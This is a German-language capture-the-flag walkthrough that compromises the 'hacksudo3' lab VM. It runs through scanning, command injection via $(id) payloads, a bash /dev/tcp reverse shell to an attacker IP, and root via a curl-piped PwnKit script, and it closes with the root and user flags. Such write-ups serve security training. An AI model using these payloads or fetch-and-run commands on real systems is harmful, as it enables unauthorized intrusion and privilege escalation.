Zuerst wird mit arp-scan das Netzwerk gescannt, um die IP-Adresse des Ziels zu ermitteln.
ARP-Scan
192.168.2.131 08:00:27:11:3f:08 PCS Systemtechnik GmbH
Als Nächstes wird die /etc/hosts-Datei bearbeitet, um den Hostnamen hacksudo3.vln der IP-Adresse zuzuordnen.
/etc/hosts
192.168.2.131 hacksudo3.vln
Nmap wird verwendet, um offene Ports und Dienste auf dem Zielsystem zu scannen. Die Option -Pn wird verwendet, um Host Discovery zu überspringen, falls ICMP blockiert ist. Anschließend wird die Ausgabe gefiltert, um nur die offenen Ports anzuzeigen.
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
Nmap wird erneut ausgeführt, um detailliertere Informationen zu erhalten.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:28 CEST
Nmap scan report for hacksudo3.vln (192.168.2.131)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Link Lock - Password-protect links
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:11:3F:08 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
S details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACERUTE
HP RTT ADDRESS
1 0.13 ms hacksudo3.vln (192.168.2.131)
Nikto wird verwendet, um den Webserver auf Schwachstellen zu scannen.
- Nikto v2.5.0
+ Target IP: 192.168.2.131
+ Target Hostname: 192.168.2.131
+ Target Port: 80
+ Start Time: 2024-09-19 22:28:51 (GMT2)
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 8de, size: 5bddff0c01c87, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: GET, PST, PTINS, HEAD .
+ /hidden/: This might be interesting.
+ /info.php: utput from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /login.php: Admin login page/section found.
+ 8103 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-09-19 22:29:02 (GMT2) (11 seconds)
+ 1 host(s) tested
Gobuster wird verwendet, um weitere Verzeichnisse und Dateien zu entdecken.
http://192.168.2.131/index.html (Status: 200) [Size: 2270]
http://192.168.2.131/login.php (Status: 200) [Size: 497]
http://192.168.2.131/info.php (Status: 200) [Size: 83308]
http://192.168.2.131/create (Status: 301) [Size: 315] [--> http://192.168.2.131/create/]
http://192.168.2.131/favicon.svg (Status: 200) [Size: 3269]
http://192.168.2.131/LICENSE (Status: 200) [Size: 1069]
http://192.168.2.131/generator.php (Status: 200) [Size: 647]
http://192.168.2.131/hidden (Status: 301) [Size: 315] [--> http://192.168.2.131/hidden/]
http://192.168.2.131/decrypt (Status: 301) [Size: 316] [--> http://192.168.2.131/decrypt/]
Die JavaScript-Datei /api.js wird analysiert, um Informationen über die Passwortverschlüsselung zu erhalten.
view-source:http://192.168.2.131/api.js
// Import the raw, plain-text password and derive a key using a SHA-256 hash
// and PBKDF2. Use the static salt for this version if one has not been given
deriveKey: async function(password, salt=null) {
let rawKey = await window.crypto.subtle.importKey(
"raw",
b64.asciiToBinary(password),
{ name: "PBKDF2" },
false,
[ "deriveBits", "deriveKey" ]
);
return await window.crypto.subtle.deriveKey(
{
name: "PBKDF2",
salt: salt null ? this.salt : salt,
iterations: 100000,
hash: "SHA-256"
},
rawKey,
{
name: "AES-GCM",
length: 256
},
true,
[ "encrypt", "decrypt" ]
);
Auf der Login-Seite wird ein Hinweis auf eine private Website gefunden.
view-source:http://192.168.2.131/login.php
Login
Authorized login to see HACKSUD private conten.
....
...
..
Die Informationen auf der /create/-Seite werden analysiert.
-----------------------------------------------------------------------------------------------------
http://192.168.2.131/create/
View on GitHub
hacksudo Link Lock
Link Lock is a tool for adding a password to a link; in other words, for encrypting and decrypting URLs. When a user visits an encrypted URL, they will be prompted for a password. If the password is correct, Link Lock sends them to the hidden website. therwise, an error is displayed. Users can also add hints to remind them of the password.
Each encrypted URL is stored entirely within the link generated by this application. As a result, users control all the data they create with Link Lock. Nothing is ever stored on a server, and there are no cookies, tracking, or signups. View on GitHub for more information, including translated versions.
ABUT US: this hacksudo locker Box Author is viluhacker for for info about Mr.vishal waghmare visit instagram.com @ realvilu Box managed By admin monali
Link Lock has many uses, for example:
Store private bookmarks on a shared computer - Password: avocado
Add a password to shared Dropbox or Google Drive links
Implement simple CAPTCHAs
Encrypt entire pages (via URL Pages) - Password: urlpage5
Post private links on public websites
Share password-protected torrents and magnet links - Password: torrenting_is-legal!
secret link
hint (optional)
password
confirm password
output
Copied
Box Created by Vishal Waghmare | hacksudo.com.
Blog leetvilu.
Es wird versucht, den Payload-Generator zu verwenden, um Befehle auszuführen.
http://192.168.2.131/generator.php#
Payload
$(id)
Payload
⛔ Enter Your Name below: ⛔
www.hacksudo.com
_ _ __________ __ _
_ _(_) __| |____|___ /___ / / /_ ____ ____ __ __| |
| | | | |/ _` |_____||_ \ |_ \| |\ \ /\ / /\ \ /\ / /\ \ /\ / /____ / _` |
| |_| | | (_| |_____|__) |__) | | \ V V / \ V V / \ V V /_____| (_| |
\__,_|_|\__,_| |____/____/| | \_/\_/ \_/\_/ \_/\_/ \__,_|
\_\
_ __
__ _| |_ __ \ \
/ _` | __/ _` | |
| (_| | || (_| | |
\__,_|\__\__,_| |
/_/
_ _ __________ __ _
__ _(_) __| |____|___ /___ / / /_ ____ ____ __ __| |
/ _` | |/ _` |_____||_ \ |_ \| |\ \ /\ / /\ \ /\ / /\ \ /\ / /____ / _` |
| (_| | | (_| |_____|__) |__) | | \ V V / \ V V / \ V V /_____| (_| |
\__, |_|\__,_| |____/____/| | \_/\_/ \_/\_/ \_/\_/ \__,_|
|___/ \_\
_ __
__ _| |_ __ \ \
/ _` | __/ _` | |
| (_| | || (_| | |
\__,_|\__\__,_| |
/_/
__________ __
__ _ _ __ ___ _ _ _ __ ___ ____|___ /___ / / /_ ____ __
/ _` | '__/ _ \| | | | '_ \/ __|_____||_ \ |_ \| |\ \ /\ / /\ \ /\ / /
| (_| | | | (_) | |_| | |_) \__ \_____|__) |__) | | \ V V / \ V V /
\__, |_| \___/ \__,_| .__/|___/ |____/____/| | \_/\_/ \_/\_/
|___/ |_| \_\
_ _ __
__ __ __| | __ _| |_ __ \ \
\ \ /\ / /____ / _` |/ _` | __/ _` | |
\ V V /_____| (_| | (_| | || (_| | |
\_/\_/ \__,_|\__,_|\__\__,_| |
/_/
😀 HACKSUD Locker: fancy name generator
💗 Smart People Alway execute Smart Plan
⛔ Enter Your Name below: ⛔
www.hacksudo.com
_ ___ ___ _ __
_ __ ___ ___ | |_ ___ ___ / _ \ _ / _ \ _ _ __ ___ ___ | |_ _ / / __
| '__/ _ \ / _ \| __(_) \/ (_) | | (_) | | (_) '__/ _ \ / _ \| __(_) / / '__|
| | | (_) | (_) | |_ _ > < _| |_| |_| |_| |_| | | (_) | (_) | |_ _ / /| |
|_| \___/ \___/ \__(_)_/\_(_)\___/(_)\___/(_)_| \___/ \___/ \__(_)_/ |_|
_ ___ _ ___ _
___ ___ | |_ _ / / |__ (_)_ __ / / |__ __ _ ___| |__
/ _ \ / _ \| __(_) / /| '_ \| | '_ \ / /| '_ \ / _` / __| '_ \
| (_) | (_) | |_ _ / / | |_) | | | | |/ / | |_) | (_| \__ \ | | |
\___/ \___/ \__(_)_/ |_.__/|_|_| |_/_/ |_.__/ \__,_|___/_| |_|
__ _ _
_ _ _ _ ___ ___ ___ _
| |__ __ _ ___| | _____ _ _ __| | ___ ___ ___/ |/ _ \ / _ \ / _ \ _/ |
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ (_) \/ (_) | | | | | | | | | (_) |
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | > < _| | |_| | |_| | |_| |_| |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___(_)_/\_(_)_|\___/ \___/ \___/(_)_|
___ ___ ___ _ _ _ ___
/ _ \ / _ \ / _ \ _| |__ __ _ ___| | _____ _ _ __| | ___ _ / / |__
| | | | | | | | | (_) '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ (_) / /| '_ \
| |_| | |_| | |_| |_| | | | (_| | (__| <\__ \ |_| | (_| | (_) | / / | | | |
\___/ \___/ \___/(_)_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___(_)_/ |_| |_|
_ _ ___ _
| |__ (_)_ __ / / |__ __ _ ___| |__
| '_ \| | '_ \ / /| '_ \ / _` / __| '_ \
| |_) | | | | |/ / | |_) | (_| \__ \ | | |
|_.__/|_|_| |_/_/ |_.__/ \__,_|___/_| |_|
$(cat /var/www/html/info.php)
$(cat /var/www/html/generator.php)
generator
😀 HACKSUD Locker: fancy name generator
💗 Smart People Alway execute Smart Plan
⛔ Enter Your Name below: ⛔
www.hacksudo.com
Es wird versucht, über die File Inclusion-Schwachstelle eine Reverse Shell zu erstellen.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
192.168.2.131/shell.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
listening on [any] 5555 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.131] 47210
bash: cannot set terminal process group (744): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$
Eine Reverse Shell wird empfangen.
Es werden SUID-Dateien gesucht.
www-data@hacksudo:/var/www/html$ find / -type f -perm -4000 -ls 2>/dev/null
886 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
688 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
1182 40 -rwsr-xr-x 1 root root 39296 Aug 30 2020 /usr/bin/umount
907 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
8121 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
853 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
577 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
839 56 -rwsr-xr-x 1 root root 55680 Aug 30 2020 /usr/bin/mount
1112 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
583 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
510 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
706 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
902 76 -rwsr-xr-x 1 root root 76744 Aug 23 2020 /usr/bin/ping
-----------------------------------------------------------------------------------------------------
9807 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
-----------------------------------------------------------------------------------------------------
65 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1988/bin/ping
81 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1988/bin/su
99 27 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/1988/bin/umount
1726 75 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1988/usr/bin/chfn
1728 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1988/usr/bin/chsh
1781 75 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1988/usr/bin/gpasswd
1845 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1988/usr/bin/newgrp
1858 59 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1988/usr/bin/passwd
1949 146 -rwsr-xr-x 1 root root 149080 Jan 19 2021 /snap/core18/1988/usr/bin/sudo
2036 42 -rwsr-xr-- 1 root systemd-network 42992 Jun 11 2020 /snap/core18/1988/usr/lib/dbus-1.0/dbus-daemon-launch-helper
2346 427 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1988/usr/lib/openssh/ssh-keysign
Privilege Escalation per pkexec
www-data@hacksudo:/tmp$ pkexec --version
pkexec version 0.105
www-data@hacksudo:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@hacksudo:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@hacksudo:/tmp# cd ~
root@hacksudo: ls
proof.txt root.txt snap
root@hacksudo: cat root.txt
Die Root-Flagge wird angezeigt.
root@hacksudo: cat root.txt
7db64dc8077ff8f969938bc48bd0a9ab
Die User-Flagge wird angezeigt.
root@hacksudo: ls /home/
hacksudo
root@hacksudo: cat /home/hacksudo/user.txt
d045e6f9feb79e94442213f9d008ac48
Privilege Escalation erfolgreich